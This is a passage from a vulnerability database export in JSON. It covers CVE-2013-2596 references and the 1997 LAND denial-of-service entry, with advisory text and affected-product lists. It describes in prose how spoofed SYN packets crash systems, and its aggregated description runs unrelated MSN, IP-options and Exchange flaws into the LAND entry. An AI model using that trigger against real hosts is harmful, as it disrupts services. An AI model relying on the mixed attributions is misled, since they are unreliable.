        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-3233"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-2546"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2548"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-7841"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-7841"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1421"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3690"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3690"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-1421"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-8884"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-8884"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/6.6_technical_notes/kernel.html#rhsa-2014-1392"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2013-2596.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-3122.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-4653.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4653"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-4608.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-3601.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2013-4483.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4655"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-4655.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3601"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5077"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-5045.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4608"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-5077.html"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-4654.html"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2014-1392.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html-single/6.6_release_notes/index.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3122"
      },
      {
        "trust": 0.1,
        "url": "https://www.redhat.com/security/data/cve/cve-2014-0181.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/team/key/#package"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4483"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0181"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5045"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4654"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2016-0450.html"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2151"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-2151"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-03380"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-2596"
      },
      {
        "db": "BID",
        "id": "59264"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002238"
      },
      {
        "db": "PACKETSTORM",
        "id": "122138"
      },
      {
        "db": "PACKETSTORM",
        "id": "130871"
      },
      {
        "db": "PACKETSTORM",
        "id": "131312"
      },
      {
        "db": "PACKETSTORM",
        "id": "128664"
      },
      {
        "db": "PACKETSTORM",
        "id": "136240"
      },
      {
        "db": "PACKETSTORM",
        "id": "131409"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201304-199"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-2596"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-03380"
      },
      {
        "db": "VULMON",
        "id": "CVE-2013-2596"
      },
      {
        "db": "BID",
        "id": "59264"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002238"
      },
      {
        "db": "PACKETSTORM",
        "id": "122138"
      },
      {
        "db": "PACKETSTORM",
        "id": "130871"
      },
      {
        "db": "PACKETSTORM",
        "id": "131312"
      },
      {
        "db": "PACKETSTORM",
        "id": "128664"
      },
      {
        "db": "PACKETSTORM",
        "id": "136240"
      },
      {
        "db": "PACKETSTORM",
        "id": "131409"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201304-199"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-2596"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-04-18T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-03380"
      },
      {
        "date": "2013-04-13T00:00:00",
        "db": "VULMON",
        "id": "CVE-2013-2596"
      },
      {
        "date": "2013-04-17T00:00:00",
        "db": "BID",
        "id": "59264"
      },
      {
        "date": "2013-04-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-002238"
      },
      {
        "date": "2013-06-24T22:57:27",
        "db": "PACKETSTORM",
        "id": "122138"
      },
      {
        "date": "2015-03-18T00:46:23",
        "db": "PACKETSTORM",
        "id": "130871"
      },
      {
        "date": "2015-04-07T16:00:18",
        "db": "PACKETSTORM",
        "id": "131312"
      },
      {
        "date": "2014-10-14T23:05:24",
        "db": "PACKETSTORM",
        "id": "128664"
      },
      {
        "date": "2016-03-15T06:01:00",
        "db": "PACKETSTORM",
        "id": "136240"
      },
      {
        "date": "2015-04-14T18:54:51",
        "db": "PACKETSTORM",
        "id": "131409"
      },
      {
        "date": "2013-04-15T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201304-199"
      },
      {
        "date": "2013-04-13T02:59:46.627000",
        "db": "NVD",
        "id": "CVE-2013-2596"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2013-04-19T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-03380"
      },
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2013-2596"
      },
      {
        "date": "2016-10-26T04:08:00",
        "db": "BID",
        "id": "59264"
      },
      {
        "date": "2015-06-08T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-002238"
      },
      {
        "date": "2022-03-21T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201304-199"
      },
      {
        "date": "2023-11-07T02:15:04.780000",
        "db": "NVD",
        "id": "CVE-2013-2596"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "59264"
      },
      {
        "db": "PACKETSTORM",
        "id": "136240"
      },
      {
        "db": "PACKETSTORM",
        "id": "131409"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201304-199"
      }
    ],
    "trust": 1.1
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "specific  Motorola Made  Android Used in etc.  Linux Kernel of  drivers/video/fbmem.c Integer overflow vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-002238"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "digital error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201304-199"
      }
    ],
    "trust": 0.6
  }
}

var-199712-0007
Vulnerability from variot

Land IP denial of service. MSN Messenger clients before version 7.0 will allow remote attackers to take control of a computer if malicious GIF files are processed. Microsoft Windows does not adequately validate IP options, allowing an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service. An attacker could take complete control of a vulnerable system. A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00. It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue. **Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible. The TCP/IP network protocol stack is the most widely used network protocol for Internet networking implemented by most operating systems. There are loopholes in the TCP/IP protocol stack implementation of early BSD-derived systems (except Linux) and Windows systems, and remote attackers can use this loophole to carry out denial-of-service attacks on the server. Due to problems in the implementation of TCP/IP, the target system may have problems processing such malformed packets. Many old versions of UNIX-like operating systems will crash, and NT's CPU resource usage will be close to 100\% (for about five minutes).

The vulnerability is caused due to improper handling of IP packets with the same destination and source IP and the SYN flag set. This causes a system to consume all available CPU resources for a certain period of time.

This kind of attack was first reported in 1997 and became known as LAND attacks.

SOLUTION: Filter traffic with the same IP address as source and destination address at the perimeter.

The vulnerability is caused due to a boundary error in the SMTP service within the handling of a certain extended verb request. This can be exploited to cause a heap-based buffer overflow by connecting to the SMTP service and issuing a specially crafted command. Instead, this requires permissions usually only granted to other Exchange servers in a domain.

Microsoft Exchange 2000 Server (requires SP3): http://www.microsoft.com/downloads/details.aspx?FamilyId=2A2AF17E-2E4A-4479-8AC9-B5544EA0BD66

Microsoft Exchange Server 2003: http://www.microsoft.com/downloads/details.aspx?FamilyId=97F409EB-C8D0-4C94-A67B-5945E26C9267

Microsoft Exchange Server 2003 (requires SP1): http://www.microsoft.com/downloads/details.aspx?FamilyId=35BCE74A-E84A-4035-BF18-196368F032CC

The following versions are not affected: * Microsoft Exchange Server 5.5 SP4 * Microsoft Exchange Server 5.0 SP2

PROVIDED AND/OR DISCOVERED BY: Mark Dowd and Ben Layer, ISS X-Force.

ORIGINAL ADVISORY: MS05-021 (KB894549): http://www.microsoft.com/technet/security/Bulletin/MS05-021.mspx

ISS X-Force: http://xforce.iss.net/xforce/alerts/id/193


About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

                  National Cyber Alert System

          Technical Cyber Security Alert TA05-102A

Multiple Vulnerabilities in Microsoft Windows Components

Original release date: April 12, 2005 Last revised: -- Source: US-CERT

Systems Affected

 * Microsoft Windows Systems

For a complete list of affected versions of the Windows operating systems and components, refer to the Microsoft Security Bulletins.

Overview

Microsoft has released a Security Bulletin Summary for April, 2005. This summary includes several bulletins that address vulnerabilities in various Windows applications and components. Details of the vulnerabilities and their impacts are provided below.

I. Description

The list below provides a mapping between Microsoft's Security Bulletins and the related US-CERT Vulnerability Notes. More information related to the vulnerabilities is available in these documents.

III. Solution

Apply a patch

Microsoft has provided the patches for these vulnerabilities in the Security Bulletins and on Windows Update.

Appendix A. References

 * Microsoft's Security Bulletin Summary for April, 2005 - <
   http://www.microsoft.com/technet/security/bulletin/ms05-apr.mspx>

 * US-CERT Vulnerability Note VU#774338 -
   <http://www.kb.cert.org/vuls/id/774338>

 * US-CERT Vulnerability Note VU#756122 -
   <http://www.kb.cert.org/vuls/id/756122>

 * US-CERT Vulnerability Note VU#222050 -
   <http://www.kb.cert.org/vuls/id/222050>

 * US-CERT Vulnerability Note VU#275193 -
   <http://www.kb.cert.org/vuls/id/275193>

 * US-CERT Vulnerability Note VU#633446 -
   <http://www.kb.cert.org/vuls/id/633446>

 * US-CERT Vulnerability Note VU#233754 -
   <http://www.kb.cert.org/vuls/id/233754>

Feedback can be directed to the authors: Will Dormann, Jeff Gennari, Chad Dougherty, Ken MacInnis, Jason Rafail, Art Manion, and Jeff Havrilla.


This document is available from:

  <http://www.us-cert.gov/cas/techalerts/TA05-102A.html>

Copyright 2005 Carnegie Mellon University.

Terms of use: http://www.us-cert.gov/legal.html


Revision History

April 12, 2005: Initial release

-----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux)

iQEVAwUBQlxwexhoSezw4YfQAQJ4RAf/bTgaa6SBDMJveqW/GnQET79F9aVPM1S2 glam1w4YFyOdyIHpDYqQZRBqgXgpJjel/MiH02tZreU5mgIjkPIWA3gleepyWvnN 7VYv8KcbSnyvGxDl/8K2YjFz550gxA3pkRD7IiqdpOums87lJ7xM7sjdUY0ZA8aF JEvA4gfndpgLSuISV7Gf8y1s4MU329DurNy3t8W4EB9Iuef/E4Z058IvHnz9dTnT XwBnyW1KfH2Ohpy7QBOtcXt1wXU8X0F+d01g/VZmTL7xVwXmcPi8UpS7bPK8A17+ asqo582KjZVR56iL7fqNQzsrXUGZncEnX/8QOhi3Ym2LfAEkKrg3rw== =BY/p -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-199712-0007",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": null,
        "scope": null,
        "trust": 5.6,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "sunos",
        "scope": "eq",
        "trust": 1.9,
        "vendor": "sun",
        "version": "4.1.4"
      },
      {
        "model": "sunos",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "sun",
        "version": "4.1.3u1"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "hp",
        "version": "10.01"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "hp",
        "version": "10.10"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "netbsd",
        "version": "1.0"
      },
      {
        "model": "windows nt",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "hp",
        "version": "10.16"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "netbsd",
        "version": "1.1"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "hp",
        "version": "10.24"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "hp",
        "version": "10.20"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "hp",
        "version": "10.30"
      },
      {
        "model": "inet",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "gnu",
        "version": "5.01"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": "9.05"
      },
      {
        "model": "winsock",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "2.0"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": "9.04"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": "9.07"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": "9.00"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": "9.01"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "7000"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": "9.03"
      },
      {
        "model": "windows 95",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "microsoft",
        "version": "*"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": "11.00"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "hp",
        "version": "10.00"
      },
      {
        "model": "windows xp home sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "2.1"
      },
      {
        "model": "windows nt workstation sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "netbsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "1.3.1"
      },
      {
        "model": "windows nt sp5",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.31"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2.5"
      },
      {
        "model": "ios aa",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.15"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0"
      },
      {
        "model": "freebsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2.6"
      },
      {
        "model": "windows nt sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows xp professional",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows nt enterprise server sp4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "bsd/os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "3.0"
      },
      {
        "model": "windows server enterprise edition sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.34"
      },
      {
        "model": "windows nt workstation sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios f",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2.4"
      },
      {
        "model": "ios bt",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0.12"
      },
      {
        "model": "windows nt workstation sp4",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows server enterprise edition itanium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "model": "windows xp tablet pc edition sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios ia",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.15"
      },
      {
        "model": "netbsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "1.3"
      },
      {
        "model": "windows xp tablet pc edition",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "bsd/os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "3.1"
      },
      {
        "model": "windows nt sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows server enterprise edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.1.x"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.2"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.1"
      },
      {
        "model": "windows xp 64-bit edition",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.3.16"
      },
      {
        "model": "windows server enterprise edition itanium sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.38"
      },
      {
        "model": "windows server standard edition sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "netware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "novell",
        "version": "4.1"
      },
      {
        "model": "windows server standard edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "2.0"
      },
      {
        "model": "windows xp media center edition",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.36"
      },
      {
        "model": "windows xp media center edition sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows nt workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "10.3"
      },
      {
        "model": "ios bt",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0.17"
      },
      {
        "model": "windows server datacenter edition itanium",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20030"
      },
      {
        "model": "windows nt sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "freebsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "3.x"
      },
      {
        "model": "windows nt enterprise server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows server datacenter edition sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "windows nt enterprise server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2.10"
      },
      {
        "model": "windows nt terminal server sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.1.5"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.7"
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "2.0.1"
      },
      {
        "model": "windows server web edition sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows nt enterprise server sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows xp tablet pc edition sp2",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows server enterprise edition itanium sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.2"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2.3"
      },
      {
        "model": "bsd/os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bsdi",
        "version": "1.1"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.0.33"
      },
      {
        "model": "windows nt terminal server sp3",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "open desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sco",
        "version": "3.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.1.6.1"
      },
      {
        "model": "ios ia",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.9"
      },
      {
        "model": "netbsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "1.3.2"
      },
      {
        "model": "ios aa",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.1.7"
      },
      {
        "model": "ios",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "11.0.17"
      },
      {
        "model": "windows server datacenter edition itanium sp1 beta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20031"
      },
      {
        "model": "windows nt enterprise server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "windows server datacenter edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
      {
        "model": "windows nt terminal server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "hp-ux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "9.0"
      },
      {
        "model": "unixware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "sco",
        "version": "2.1"
      },
      {
        "model": "windows xp professional sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "microsoft",
        "version": null
      },
      {
        "model": "windows nt sp3 alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "4.0"
      },
      {
        "model": "freebsd",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "2.2.2"
      },
      {
        "model": "windows server standard edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2003"
      },
